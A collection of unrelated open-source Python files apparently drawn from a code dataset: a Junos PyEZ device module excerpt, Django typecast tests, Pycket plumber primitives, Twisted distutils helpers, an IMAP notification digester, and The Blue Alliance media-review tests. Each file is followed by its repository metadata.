# ------------------------------------------------------------------------
# cli - for cheating commands :-)
# ------------------------------------------------------------------------
def cli(self, command, format='text', warning=True):
"""
Executes the CLI command and returns the CLI text output by default.
:param str command:
The CLI command to execute, e.g. "show version"
:param str format:
The return format, by default is text. You can optionally select
"xml" to return the XML structure.
.. note::
You can also use this method to obtain the XML RPC command for a
given CLI command by using the pipe filter ``| display xml rpc``. When
you do this, the return value is the XML RPC command. For example if
you provide as the command ``show version | display xml rpc``, you will
get back the XML Element ``<get-software-information>``.
.. warning::
This function is provided for **DEBUG** purposes only!
**DO NOT** use this method for general automation purposes as
that puts you in the realm of "screen-scraping the CLI". The purpose of
the PyEZ framework is to migrate away from that tooling pattern.
Interaction with the device should be done via the RPC function.
.. warning::
You cannot use "pipe" filters with **command** such as ``| match``
            or ``| count``, etc. The only valid use of the "pipe" is for the
``| display xml rpc`` as noted above.
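        A typical debug-only invocation (output elided)::
            print(dev.cli('show version', warning=False))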
"""
if 'display xml rpc' not in command and warning is True:
warnings.simplefilter("always")
warnings.warn("CLI command is for debug use only!", RuntimeWarning)
warnings.resetwarnings()
try:
rsp = self.rpc.cli(command, format)
if rsp.tag == 'output':
return rsp.text
if rsp.tag == 'configuration-information':
return rsp.findtext('configuration-output')
if rsp.tag == 'rpc':
return rsp[0]
return rsp
except:
return "invalid command: " + command
def display_xml_rpc(self, command, format='xml'):
"""
        Retrieves the XML RPC equivalent of the given CLI command and returns
        it as an XML Element by default.
:param str command:
The CLI command to retrieve XML RPC for, e.g. "show version"
:param str format:
The return format, by default is XML. You can optionally select
"text" to return the XML structure as a string.
"""
try:
command = command + '| display xml rpc'
rsp = self.rpc.cli(command)
if format == 'text':
return etree.tostring(rsp[0])
return rsp[0]
except:
return "invalid command: " + command
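    # Example (illustrative): display_xml_rpc('show version') returns the
    # <get-software-information> RPC element; pass format='text' to get the
    # same structure back as a string instead.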
# ------------------------------------------------------------------------
# Template: retrieves a Jinja2 template
# ------------------------------------------------------------------------
def Template(self, filename, parent=None, gvars=None):
"""
Used to return a Jinja2 :class:`Template`.
:param str filename:
file-path to Jinja2 template file on local device
        :returns: Jinja2 :class:`Template` for the given **filename**.
"""
return self._j2ldr.get_template(filename, parent, gvars)
# ------------------------------------------------------------------------
# dealing with bind aspects
# ------------------------------------------------------------------------
def bind(self, *vargs, **kvargs):
"""
Used to attach things to this Device instance and make them a
        property of the :class:`Device` instance. The most common use
        for bind is attaching Utility instances to a :class:`Device`.
For example::
from jnpr.junos.utils.config import Config
dev.bind( cu=Config )
dev.cu.lock()
# ... load some changes
dev.cu.commit()
dev.cu.unlock()
:param list vargs:
A list of functions that will get bound as instance methods to
this Device instance.
.. warning:: Experimental.
:param new_property:
name/class pairs that will create resource-managers bound as
instance attributes to this Device instance. See code example above
"""
if len(vargs):
for fn in vargs:
# check for name clashes before binding
if hasattr(self, fn.__name__):
raise ValueError(
"request attribute name %s already exists" %
fn.__name__)
for fn in vargs:
                # bind as an instance method, magic.
self.__dict__[
fn.__name__] = types.MethodType(
fn,
self,
self.__class__)
return
# first verify that the names do not conflict with
# existing object attribute names
for name in kvargs.keys():
# check for name-clashes before binding
if hasattr(self, name):
raise ValueError(
"requested attribute name %s already exists" %
name)
# now instantiate items and bind to this :Device:
for name, thing in kvargs.items():
new_inst = thing(self)
self.__dict__[name] = new_inst
self._manages.append(name)
# ------------------------------------------------------------------------
# facts
# ------------------------------------------------------------------------
def facts_refresh(self, exception_on_failure=False):
"""
Reload the facts from the Junos device into :attr:`facts` property.
:param bool exception_on_failure: To raise exception or warning when
facts gathering errors out.
"""
for gather in FACT_LIST:
try:
gather(self, self._facts)
except:
if exception_on_failure:
raise
warnings.warn('Facts gathering is incomplete. '
'To know the reason call "dev.facts_refresh(exception_on_failure=True)"', RuntimeWarning)
return
# ------------------------------------------------------------------------
# probe
# ------------------------------------------------------------------------
def probe(self, timeout=5, intvtimeout=1):
"""
Probe the device to determine if the Device can accept a remote
connection.
        This method is meant to be called *prior* to :meth:`open`.
This method will not work with ssh-jumphost environments.
:param int timeout:
          The probe will report ``True``/``False`` if the device reports
connectivity within this timeout (seconds)
:param int intvtimeout:
Timeout interval on the socket connection. Generally you should not
change this value, but you can if you want to twiddle the frequency
of the socket attempts on the connection
:returns: ``True`` if probe is successful, ``False`` otherwise
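        For example, probing before an explicit open (the timeout value is
        illustrative)::
            if dev.probe(timeout=3):
                dev.open()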
"""
start = datetime.datetime.now()
end = start + datetime.timedelta(seconds=timeout)
probe_ok = True
while datetime.datetime.now() < end:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(intvtimeout)
try:
s.connect((self.hostname, self._port))
s.shutdown(socket.SHUT_RDWR)
s.close()
break
except:
time.sleep(1)
pass
else:
elapsed = datetime.datetime.now() - start
probe_ok = False
return probe_ok
# -----------------------------------------------------------------------
# Context Manager
# -----------------------------------------------------------------------
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self._conn.connected and \
not isinstance(exc_val, EzErrors.ConnectError):
self.close()
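# Usage sketch for the context manager above (credentials are placeholders):
#
#   with Device(host='192.0.2.1', user='lab', passwd='lab123') as dev:
#       print(dev.facts)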
|
mith1979/ansible_automation
|
applied_python/applied_python/lib/python2.7/site-packages/jnpr/junos/device.py
|
Python
|
apache-2.0
| 30,232
|
# Unit tests for typecast functions in django.db.backends.util
import datetime
import unittest
from django.db.backends import utils as typecasts
from django.utils import six
TEST_CASES = {
'typecast_date': (
('', None),
(None, None),
('2005-08-11', datetime.date(2005, 8, 11)),
('1990-01-01', datetime.date(1990, 1, 1)),
),
'typecast_time': (
('', None),
(None, None),
('0:00:00', datetime.time(0, 0)),
('0:30:00', datetime.time(0, 30)),
('8:50:00', datetime.time(8, 50)),
('08:50:00', datetime.time(8, 50)),
('12:00:00', datetime.time(12, 00)),
('12:30:00', datetime.time(12, 30)),
('13:00:00', datetime.time(13, 00)),
('23:59:00', datetime.time(23, 59)),
('00:00:12', datetime.time(0, 0, 12)),
('00:00:12.5', datetime.time(0, 0, 12, 500000)),
('7:22:13.312', datetime.time(7, 22, 13, 312000)),
),
'typecast_timestamp': (
('', None),
(None, None),
('2005-08-11 0:00:00', datetime.datetime(2005, 8, 11)),
('2005-08-11 0:30:00', datetime.datetime(2005, 8, 11, 0, 30)),
('2005-08-11 8:50:30', datetime.datetime(2005, 8, 11, 8, 50, 30)),
('2005-08-11 8:50:30.123', datetime.datetime(2005, 8, 11, 8, 50, 30, 123000)),
('2005-08-11 8:50:30.9', datetime.datetime(2005, 8, 11, 8, 50, 30, 900000)),
('2005-08-11 8:50:30.312-05', datetime.datetime(2005, 8, 11, 8, 50, 30, 312000)),
('2005-08-11 8:50:30.312+02', datetime.datetime(2005, 8, 11, 8, 50, 30, 312000)),
# ticket 14453
('2010-10-12 15:29:22.063202', datetime.datetime(2010, 10, 12, 15, 29, 22, 63202)),
('2010-10-12 15:29:22.063202-03', datetime.datetime(2010, 10, 12, 15, 29, 22, 63202)),
('2010-10-12 15:29:22.063202+04', datetime.datetime(2010, 10, 12, 15, 29, 22, 63202)),
('2010-10-12 15:29:22.0632021', datetime.datetime(2010, 10, 12, 15, 29, 22, 63202)),
('2010-10-12 15:29:22.0632029', datetime.datetime(2010, 10, 12, 15, 29, 22, 63202)),
),
}
class DBTypeCasts(unittest.TestCase):
def test_typeCasts(self):
for k, v in six.iteritems(TEST_CASES):
for inpt, expected in v:
got = getattr(typecasts, k)(inpt)
self.assertEqual(
got,
expected,
"In %s: %r doesn't match %r. Got %r instead." % (k, inpt, expected, got)
)
|
moreati/django
|
tests/db_typecasts/tests.py
|
Python
|
bsd-3-clause
| 2,490
|
from django.contrib import admin
from organization.models.Organization import Organization
# Register your models here.
admin.site.register(Organization)
|
arcingio/arcing.io
|
services/cms/organization/admin.py
|
Python
|
mit
| 149
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pycket import values, values_parameter
from pycket.prims.expose import (expose, expose_val, default, make_procedure, procedure)
from pycket.cont import continuation, loop_label
class W_PlumberFlushHandle(values.W_Object):
_attrs_ = _immutable_fields_ = ["plumber"]
def __init__(self, plumber):
self.plumber = plumber
def get_plumber(self):
return self.plumber
class W_Plumber(values.W_Object):
_attrs_ = ["callbacks", "weak_callbacks"]
    def __init__(self, callbacks=None, weak_callbacks=None):
        # avoid shared mutable default arguments: give each plumber its own dicts
        self.callbacks = callbacks if callbacks is not None else {} # hash table of handles -> callbacks
        self.weak_callbacks = weak_callbacks if weak_callbacks is not None else {} # same, but weak references
def get_callbacks(self):
return self.callbacks
def get_weak_callbacks(self):
return self.weak_callbacks
def set_callback(self, h, proc):
self.callbacks[h] = proc
def set_weak_callback(self, h, proc):
self.weak_callbacks[h] = proc
def remove_handle(self, handle):
if handle in self.callbacks:
del(self.callbacks[handle])
if handle in self.weak_callbacks:
del(self.weak_callbacks[handle])
current_plumber_param = values_parameter.W_Parameter(W_Plumber())
expose_val("current-plumber", current_plumber_param)
@expose("make-plumber", [])
def make_plumber():
return W_Plumber()
@expose("plumber-add-flush!", [W_Plumber, procedure, default(values.W_Bool, values.w_false)])
def plumber_add_flush_bang(p, proc, is_weak):
# create a new handle
h = W_PlumberFlushHandle(p)
# put the new handle into p's callbacks with the given proc
if is_weak is values.w_true:
p.set_weak_callback(h, proc)
else:
p.set_callback(h, proc)
return h
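# The flush machinery below is written in continuation-passing style: each
# callback is invoked with its handle, and plumber_flush_loop_cont advances the
# index until every (handle, callback) pair has been called, then returns w_void.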
@continuation
def plumber_flush_loop_cont(handlers_callbacks, index, env, cont, _vals):
from pycket.interpreter import return_value
if index >= len(handlers_callbacks):
return return_value(values.w_void, env, cont)
else:
return plumber_flush_loop(handlers_callbacks, index, env, cont)
@loop_label
def plumber_flush_loop(handlers_callbacks, index, env, cont):
current_h = handlers_callbacks[index][0]
current_proc = handlers_callbacks[index][1]
return current_proc.call([current_h], env, plumber_flush_loop_cont(handlers_callbacks, index + 1, env, cont))
@expose("plumber-flush-all", [W_Plumber], simple=False)
def plumber_flush_all(p, env, cont):
return do_plumber_flush_all(p, env, cont)
def do_plumber_flush_all(p, env, cont):
from pycket.interpreter import return_value
callbacks = p.get_callbacks()
weak_callbacks = p.get_weak_callbacks()
handlers_callbacks = [None]*(len(callbacks) + len(weak_callbacks))
index = 0
for h, proc in callbacks.iteritems():
handlers_callbacks[index] = [h, proc]
index += 1
for h, proc in weak_callbacks.iteritems():
handlers_callbacks[index] = [h, proc]
index += 1
if not handlers_callbacks:
return return_value(values.w_void, env, cont)
return plumber_flush_loop(handlers_callbacks, 0, env, cont)
@expose("plumber-flush-handle-remove!", [W_PlumberFlushHandle])
def plumber_flush_handle_remove_bang(h):
p = h.get_plumber()
# remove the given handle from it's plumber's callbacks
p.remove_handle(h)
return values.w_void
|
pycket/pycket
|
pycket/prims/plumber.py
|
Python
|
mit
| 3,398
|
# -*- test-case-name: twisted.python.test.test_dist -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Distutils convenience functionality.
Don't use this outside of Twisted.
Maintainer: Christopher Armstrong
@var _EXTRA_OPTIONS: These are the actual package names and versions that will
be used by C{extras_require}. This is not passed to setup directly so that
combinations of the packages can be created without the need to copy
package names multiple times.
@var _EXTRAS_REQUIRE: C{extras_require} is a dictionary of items that can be
passed to setup.py to install optional dependencies. For example, to
install the optional dev dependencies one would type::
pip install -e ".[dev]"
This has been supported by setuptools since 0.5a4.
@var _PLATFORM_INDEPENDENT: A list of all optional cross-platform dependencies,
as setuptools version specifiers, used to populate L{_EXTRAS_REQUIRE}.
"""
import os
import platform
import sys
from distutils.command import build_scripts, build_ext
from distutils.errors import CompileError
from setuptools import setup as _setup
from setuptools import Extension
from twisted import copyright
from twisted.python.compat import execfile
STATIC_PACKAGE_METADATA = dict(
name="Twisted",
version=copyright.version,
description="An asynchronous networking framework written in Python",
author="Twisted Matrix Laboratories",
author_email="twisted-python@twistedmatrix.com",
maintainer="Glyph Lefkowitz",
maintainer_email="glyph@twistedmatrix.com",
url="http://twistedmatrix.com/",
license="MIT",
long_description="""\
An extensible framework for Python programming, with special focus
on event-based network programming and multiprotocol integration.
""",
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
],
)
_EXTRA_OPTIONS = dict(
dev=['twistedchecker >= 0.4.0',
'pyflakes >= 1.0.0',
'twisted-dev-tools >= 0.0.2',
'python-subunit',
'sphinx >= 1.3.1',
'pydoctor >= 15.0.0'],
tls=['pyopenssl >= 0.13',
'service_identity',
'idna >= 0.6'],
conch=['gmpy',
'pyasn1',
'cryptography >= 0.9.1',
'appdirs >= 1.4.0',
],
soap=['soappy'],
serial=['pyserial'],
osx=['pyobjc'],
windows=['pypiwin32']
)
_PLATFORM_INDEPENDENT = (
_EXTRA_OPTIONS['tls'] +
_EXTRA_OPTIONS['conch'] +
_EXTRA_OPTIONS['soap'] +
_EXTRA_OPTIONS['serial']
)
_EXTRAS_REQUIRE = {
'dev': _EXTRA_OPTIONS['dev'],
'tls': _EXTRA_OPTIONS['tls'],
'conch': _EXTRA_OPTIONS['conch'],
'soap': _EXTRA_OPTIONS['soap'],
'serial': _EXTRA_OPTIONS['serial'],
'all_non_platform': _PLATFORM_INDEPENDENT,
'osx_platform': (
_EXTRA_OPTIONS['osx'] + _PLATFORM_INDEPENDENT
),
'windows_platform': (
_EXTRA_OPTIONS['windows'] + _PLATFORM_INDEPENDENT
),
}
class ConditionalExtension(Extension):
"""
An extension module that will only be compiled if certain conditions are
met.
@param condition: A callable of one argument which returns True or False to
indicate whether the extension should be built. The argument is an
instance of L{build_ext_twisted}, which has useful methods for checking
things about the platform.
"""
def __init__(self, *args, **kwargs):
self.condition = kwargs.pop("condition", lambda builder: True)
Extension.__init__(self, *args, **kwargs)
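# A hypothetical ConditionalExtension, mirroring the pattern used in
# getExtensions() below (module and source names are illustrative only):
#
#   ConditionalExtension("twisted.some._speedups", ["twisted/some/_speedups.c"],
#                        condition=lambda builder: builder._check_header("sys/time.h"))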
def setup(**kw):
"""
An alternative to distutils' setup() which is specially designed
for Twisted subprojects.
@param conditionalExtensions: Extensions to optionally build.
@type conditionalExtensions: C{list} of L{ConditionalExtension}
"""
return _setup(**get_setup_args(**kw))
def get_setup_args(**kw):
if 'cmdclass' not in kw:
kw['cmdclass'] = {'build_scripts': build_scripts_twisted}
if "conditionalExtensions" in kw:
extensions = kw["conditionalExtensions"]
del kw["conditionalExtensions"]
if 'ext_modules' not in kw:
# This is a workaround for distutils behavior; ext_modules isn't
# actually used by our custom builder. distutils deep-down checks
# to see if there are any ext_modules defined before invoking
# the build_ext command. We need to trigger build_ext regardless
# because it is the thing that does the conditional checks to see
# if it should build any extensions. The reason we have to delay
# the conditional checks until then is that the compiler objects
# are not yet set up when this code is executed.
kw["ext_modules"] = extensions
class my_build_ext(build_ext_twisted):
conditionalExtensions = extensions
kw.setdefault('cmdclass', {})['build_ext'] = my_build_ext
return kw
def getVersion(base):
"""
Extract the version number.
@rtype: str
@returns: The version number of the project, as a string like
"2.0.0".
"""
vfile = os.path.join(base, '_version.py')
ns = {'__name__': 'Nothing to see here'}
execfile(vfile, ns)
return ns['version'].base()
def getExtensions():
"""
Get the C extensions used for Twisted.
"""
extensions = [
ConditionalExtension(
"twisted.test.raiser",
["twisted/test/raiser.c"],
condition=lambda _: _isCPython),
ConditionalExtension(
"twisted.internet.iocpreactor.iocpsupport",
["twisted/internet/iocpreactor/iocpsupport/iocpsupport.c",
"twisted/internet/iocpreactor/iocpsupport/winsock_pointers.c"],
libraries=["ws2_32"],
condition=lambda _: _isCPython and sys.platform == "win32"),
ConditionalExtension(
"twisted.python._sendmsg",
sources=["twisted/python/_sendmsg.c"],
condition=lambda _: sys.platform != "win32"),
ConditionalExtension(
"twisted.runner.portmap",
["twisted/runner/portmap.c"],
condition=lambda builder: builder._check_header("rpc/rpc.h")),
]
return extensions
def getScripts(basedir=''):
"""
Returns a list of scripts for Twisted.
"""
scriptdir = os.path.join(basedir, 'bin')
if not os.path.isdir(scriptdir):
# Probably a project-specific tarball, in which case only this
# project's bins are included in 'bin'
scriptdir = os.path.join(basedir, 'bin')
if not os.path.isdir(scriptdir):
return []
thingies = os.listdir(scriptdir)
for specialExclusion in ['.svn', '_preamble.py', '_preamble.pyc']:
if specialExclusion in thingies:
thingies.remove(specialExclusion)
return list(filter(os.path.isfile,
[os.path.join(scriptdir, x) for x in thingies]))
## Helpers and distutil tweaks
class build_scripts_twisted(build_scripts.build_scripts):
"""
Renames scripts so they end with '.py' on Windows.
"""
def run(self):
build_scripts.build_scripts.run(self)
if not os.name == "nt":
return
for f in os.listdir(self.build_dir):
fpath = os.path.join(self.build_dir, f)
if not fpath.endswith(".py"):
pypath = fpath + ".py"
if os.path.exists(pypath):
os.unlink(pypath)
os.rename(fpath, pypath)
class build_ext_twisted(build_ext.build_ext):
"""
Allow subclasses to easily detect and customize Extensions to
build at install-time.
"""
def prepare_extensions(self):
"""
Prepare the C{self.extensions} attribute (used by
L{build_ext.build_ext}) by checking which extensions in
L{conditionalExtensions} should be built. In addition, if we are
building on NT, define the WIN32 macro to 1.
"""
# always define WIN32 under Windows
if os.name == 'nt':
self.define_macros = [("WIN32", 1)]
else:
self.define_macros = []
# On Solaris 10, we need to define the _XOPEN_SOURCE and
# _XOPEN_SOURCE_EXTENDED macros to build in order to gain access to
# the msg_control, msg_controllen, and msg_flags members in
# sendmsg.c. (according to
# http://stackoverflow.com/questions/1034587). See the documentation
# of X/Open CAE in the standards(5) man page of Solaris.
if sys.platform.startswith('sunos'):
self.define_macros.append(('_XOPEN_SOURCE', 1))
self.define_macros.append(('_XOPEN_SOURCE_EXTENDED', 1))
self.extensions = [x for x in self.conditionalExtensions
if x.condition(self)]
for ext in self.extensions:
ext.define_macros.extend(self.define_macros)
def build_extensions(self):
"""
Check to see which extension modules to build and then build them.
"""
self.prepare_extensions()
build_ext.build_ext.build_extensions(self)
def _remove_conftest(self):
for filename in ("conftest.c", "conftest.o", "conftest.obj"):
try:
os.unlink(filename)
except EnvironmentError:
pass
def _compile_helper(self, content):
conftest = open("conftest.c", "w")
try:
conftest.write(content)
conftest.close()
try:
self.compiler.compile(["conftest.c"], output_dir='')
except CompileError:
return False
return True
finally:
self._remove_conftest()
def _check_header(self, header_name):
"""
Check if the given header can be included by trying to compile a file
that contains only an #include line.
"""
self.compiler.announce("checking for %s ..." % header_name, 0)
return self._compile_helper("#include <%s>\n" % header_name)
def _checkCPython(sys=sys, platform=platform):
"""
Checks if this implementation is CPython.
This uses C{platform.python_implementation}.
This takes C{sys} and C{platform} kwargs that by default use the real
modules. You shouldn't care about these -- they are for testing purposes
only.
@return: C{False} if the implementation is definitely not CPython, C{True}
otherwise.
"""
return platform.python_implementation() == "CPython"
_isCPython = _checkCPython()
|
Architektor/PySnip
|
venv/lib/python2.7/site-packages/twisted/python/dist.py
|
Python
|
gpl-3.0
| 10,777
|
import email
import imaplib
import re
from imapclient import IMAPClient
from utils import Utils
class DigestServer(object):
def __init__(self, server, mid, digest_folder_name):
self.digest_folder_name = digest_folder_name
self.digest_inbox = server
self.previous_message_id = mid
def delete_previous_message(self):
self.digest_inbox.delete_messages([self.previous_message_id])
def append(self, message):
self.digest_inbox.append(self.digest_folder_name, message.encode("utf-8"))
class DigestionProcessor(object):
def __init__(self, notification_folder, digest_folder, digesters,
print_summary, sender_to_implicate, move_unmatched, digest_folder_name):
        super(DigestionProcessor, self).__init__()
self.digest_folder_name = digest_folder_name
self.digesters = digesters
self.move_unmatched = move_unmatched
self.sender_to_implicate = sender_to_implicate
self.print_summary = print_summary
self.digest_folder = digest_folder
self.notification_folder = notification_folder
def doit(self):
messages = self.notification_folder.search('NOT DELETED')
response = self.notification_folder.fetch(messages, ['FLAGS', 'RFC822.SIZE'])
unmatched_mails = []
to_delete = []
# Loop through email in notification folder
for msgid, data in response.items():
rfc_msgid = self.notification_folder.fetch(msgid, ["INTERNALDATE", "BODY", "RFC822"])[msgid]
rfc822content = rfc_msgid[b'RFC822'].decode('ISO-8859-1')
            # Debugging a strange transcription error?
            # This catch-all Exception handler may need to be commented out
# so that you can see the full (root cause) stack trace
try:
self.process_incoming_notification(msgid, self.digesters, rfc822content, to_delete,
unmatched_mails, self.move_unmatched)
except Exception as e:
modified_mail = re.sub("\nSubject:", "\nSubject: [" + str(e) + "]", rfc822content)
unmatched_mails.append(modified_mail)
# Rewrite emails in the digest folder (the one the end-user actually reads)
for digester in self.digesters:
subj_to_match = 'HEADER Subject "' + digester.matching_digest_subject() + '"'
from_to_match = 'HEADER From "' + digester.matching_digest_sender() + '"'
search_criteria = 'NOT DELETED ' + subj_to_match + " " + from_to_match
try:
messages = self.digest_folder.search(search_criteria)
except imaplib.IMAP4.abort:
messages = self.digest_folder.search(search_criteria)
response = self.digest_folder.fetch(messages, ['FLAGS', 'RFC822.SIZE'])
previously_seen = False
previous_message_id = None
for msgid, data in response.items():
previous_message_id = msgid
previously_seen = '\\Seen' in data[b'FLAGS']
digest_inbox_proxy = DigestServer(self.digest_folder, previous_message_id, self.digest_folder_name)
digester.rewrite_digest_emails(digest_inbox_proxy, previous_message_id is not None, previously_seen,
self.sender_to_implicate)
# Move Unmatched files so the human can see them
for unmatched in unmatched_mails:
# unm = re.sub("\nFrom: .*\r\n", "\nFrom: " + self.sender_to_implicate + "\r\n", unm)
# unm = re.sub("\nTo: .*\r\n", "\nTo: " + self.sender_to_implicate + "\r\n", unm)
# modified_mail = re.sub("\\nSubject:", "\\nSubject: [I:D]", unmatched)
modified_mail = unmatched.replace("\nSubject:", "\nSubject: [I:D]")
# print("UNMATCHED:::")
# print(modified_mail)
# b = bytes(modified_mail, "utf8")
# print("-=-=-=-=-=-=-=-=")
# print(str(b))
try:
self.digest_folder.append(self.digest_folder_name, modified_mail.encode('utf-8'))
except IMAPClient.AbortError as e:
print("Can't move '" + self.get_subject(modified_mail) + "', error:" + str(e))
break
# Delete Originals
self.notification_folder.delete_messages(to_delete)
# Print summary for posterity
if self.print_summary:
for digester in self.digesters:
digester.print_summary()
def get_subject(self, rfc822content):
for line in rfc822content.split("\\n"):
if line.startswith("Subject: "):
return line[len("Subject: "):]
return "[i:d] - unknown subject"
def process_incoming_notification(self, msgid, digesters, rfc822content, to_delete,
unmatched_to_move, move_unmatched):
msg = email.message_from_string(rfc822content)
html_message = Utils.get_decoded_email_body(msg, True)
text_message = Utils.get_decoded_email_body(msg, False)
if type(text_message) is bytes:
text_message = text_message.decode("utf-8")
processed = False
for digester in digesters:
if processed:
break
matching_incoming_headers = digester.matching_incoming_headers()
for matching_header in matching_incoming_headers:
# Note, matching_header contains things like:
# From: .* <jira@apache.org>
# ^ regex!!
# Note2, rfc822content contains everything as a string, including the headers
# ...
# From: "Thomas Neidhart (JIRA)" <jira@apache.org>
# To: <you@example.com>
# Message-ID: <JIRA.12911300.1446902881000.65833.1447445412298@Atlassian.JIRA>
# ...
if re.search(matching_header, rfc822content) is not None or rfc822content.find(matching_header) != -1:
processed = digester.process_new_notification(rfc822content, msg, html_message, text_message)
break
if processed:
to_delete.append(msgid)
else:
if move_unmatched:
unmatched_to_move.append(rfc822content)
to_delete.append(msgid)
else:
print("Unmatched email from: " + msg['From'].strip() + ", subject: " + msg['Subject'].strip())
|
paul-hammant/imapdigester
|
digesters/digestion_processor.py
|
Python
|
mit
| 6,530
|
import re
from typing import List
from urllib.parse import urlparse
import pytest
from bs4 import BeautifulSoup
from google.appengine.ext import ndb
from werkzeug.test import Client
from backend.common.consts.account_permission import AccountPermission
from backend.common.consts.media_type import MediaType
from backend.common.consts.suggestion_state import SuggestionState
from backend.common.models.media import Media
from backend.common.models.suggestion import Suggestion
from backend.common.models.team import Team
from backend.common.suggestions.suggestion_creator import (
SuggestionCreationStatus,
SuggestionCreator,
)
@pytest.fixture
def login_user_with_permission(login_user):
login_user.permissions = [AccountPermission.REVIEW_MEDIA]
return login_user
def get_suggestion_queue(web_client: Client) -> List[str]:
response = web_client.get("/suggest/team/media/review")
assert response.status_code == 200
soup = BeautifulSoup(response.data, "html.parser")
review_form = soup.find(id="review_media")
assert review_form is not None
suggestions = review_form.find_all(class_="suggestion-item")
queue = []
for suggestion in suggestions:
accept_button = suggestion.find(
"input",
attrs={
"name": re.compile("accept_reject-.*"),
"value": re.compile("accept::.*"),
},
)
assert accept_button is not None
reject_button = suggestion.find(
"input",
attrs={
"name": re.compile("accept_reject-.*"),
"value": re.compile("reject::.*"),
},
)
assert reject_button is not None
year = suggestion.find("input", attrs={"name": re.compile("year-.*")})
assert year is not None
queue.append(accept_button["value"].split("::")[1])
return queue
def createSuggestion(logged_in_user) -> str:
status = SuggestionCreator.createTeamMediaSuggestion(
logged_in_user.account_key, "http://imgur.com/foobar", "frc1124", "2016"
)
assert status[0] == SuggestionCreationStatus.SUCCESS
return Suggestion.render_media_key_name(2016, "team", "frc1124", "imgur", "foobar")
def test_login_redirect(web_client: Client) -> None:
response = web_client.get("/suggest/team/media/review")
assert response.status_code == 302
assert urlparse(response.headers["Location"]).path == "/account/login"
def test_no_permissions(login_user, web_client: Client) -> None:
response = web_client.get("/suggest/team/media/review")
assert response.status_code == 401
def test_nothing_to_review(login_user_with_permission, web_client: Client) -> None:
queue = get_suggestion_queue(web_client)
assert queue == []
def test_accept_suggestion(
login_user_with_permission,
ndb_stub,
web_client: Client,
taskqueue_stub,
) -> None:
suggestion_id = createSuggestion(login_user_with_permission)
queue = get_suggestion_queue(web_client)
assert queue == [suggestion_id]
response = web_client.post(
"/suggest/team/media/review",
data={
f"accept_reject-{suggestion_id}": f"accept::{suggestion_id}",
},
follow_redirects=True,
)
assert response.status_code == 200
suggestion = Suggestion.get_by_id(suggestion_id)
assert suggestion is not None
assert suggestion.review_state == SuggestionState.REVIEW_ACCEPTED
media = Media.get_by_id(Media.render_key_name(MediaType.IMGUR, "foobar"))
assert media is not None
assert media.year == 2016
assert media.foreign_key == "foobar"
assert media.media_type_enum == MediaType.IMGUR
assert ndb.Key(Team, "frc1124") in media.references
assert media.preferred_references == []
def test_accept_suggestion_change_year(
login_user_with_permission,
ndb_stub,
web_client: Client,
taskqueue_stub,
) -> None:
suggestion_id = createSuggestion(login_user_with_permission)
queue = get_suggestion_queue(web_client)
assert queue == [suggestion_id]
response = web_client.post(
"/suggest/team/media/review",
data={
f"accept_reject-{suggestion_id}": f"accept::{suggestion_id}",
f"year-{suggestion_id}": "2017",
},
follow_redirects=True,
)
assert response.status_code == 200
suggestion = Suggestion.get_by_id(suggestion_id)
assert suggestion is not None
assert suggestion.review_state == SuggestionState.REVIEW_ACCEPTED
media = Media.get_by_id(Media.render_key_name(MediaType.IMGUR, "foobar"))
assert media is not None
assert media.year == 2017
assert media.foreign_key == "foobar"
assert media.media_type_enum == MediaType.IMGUR
assert ndb.Key(Team, "frc1124") in media.references
assert media.preferred_references == []
def test_accept_suggestion_as_preferred(
login_user_with_permission,
ndb_stub,
web_client: Client,
taskqueue_stub,
) -> None:
suggestion_id = createSuggestion(login_user_with_permission)
queue = get_suggestion_queue(web_client)
assert queue == [suggestion_id]
response = web_client.post(
"/suggest/team/media/review",
data={
f"accept_reject-{suggestion_id}": f"accept::{suggestion_id}",
"preferred_keys[]": [f"preferred::{suggestion_id}"],
},
follow_redirects=True,
)
assert response.status_code == 200
suggestion = Suggestion.get_by_id(suggestion_id)
assert suggestion is not None
assert suggestion.review_state == SuggestionState.REVIEW_ACCEPTED
media = Media.get_by_id(Media.render_key_name(MediaType.IMGUR, "foobar"))
assert media is not None
assert media.year == 2016
assert media.foreign_key == "foobar"
assert media.media_type_enum == MediaType.IMGUR
assert ndb.Key(Team, "frc1124") in media.references
assert ndb.Key(Team, "frc1124") in media.preferred_references
def test_accept_suggestion_as_preferred_and_replace(
login_user_with_permission,
ndb_stub,
web_client: Client,
taskqueue_stub,
) -> None:
# Create an existing preferred media
existing_preferred = Media(
id=Media.render_key_name(MediaType.IMGUR, "baz"),
foreign_key="baz",
media_type_enum=MediaType.IMGUR,
year=2016,
preferred_references=[ndb.Key(Team, "frc1124")],
)
existing_preferred.put()
suggestion_id = createSuggestion(login_user_with_permission)
queue = get_suggestion_queue(web_client)
assert queue == [suggestion_id]
response = web_client.post(
"/suggest/team/media/review",
data={
f"accept_reject-{suggestion_id}": f"accept::{suggestion_id}",
"preferred_keys[]": [f"preferred::{suggestion_id}"],
f"replace-preferred-{suggestion_id}": existing_preferred.key_name,
},
follow_redirects=True,
)
assert response.status_code == 200
suggestion = Suggestion.get_by_id(suggestion_id)
assert suggestion is not None
assert suggestion.review_state == SuggestionState.REVIEW_ACCEPTED
media = Media.get_by_id(Media.render_key_name(MediaType.IMGUR, "foobar"))
assert media is not None
assert media.year == 2016
assert media.foreign_key == "foobar"
assert media.media_type_enum == MediaType.IMGUR
assert ndb.Key(Team, "frc1124") in media.references
assert ndb.Key(Team, "frc1124") in media.preferred_references
old_preferred_media = Media.get_by_id(existing_preferred.key_name)
assert old_preferred_media is not None
assert ndb.Key(Team, "frc1124") not in old_preferred_media.preferred_references
def test_reject_suggestion(
login_user_with_permission, ndb_stub, web_client: Client
) -> None:
suggestion_id = createSuggestion(login_user_with_permission)
queue = get_suggestion_queue(web_client)
assert queue == [suggestion_id]
response = web_client.post(
"/suggest/team/media/review",
data={
f"accept_reject-{suggestion_id}": f"reject::{suggestion_id}",
},
follow_redirects=True,
)
assert response.status_code == 200
suggestion = Suggestion.get_by_id(suggestion_id)
assert suggestion is not None
assert suggestion.review_state == SuggestionState.REVIEW_REJECTED
# Verify no medias are created
medias = Media.query().fetch()
assert medias == []
|
the-blue-alliance/the-blue-alliance
|
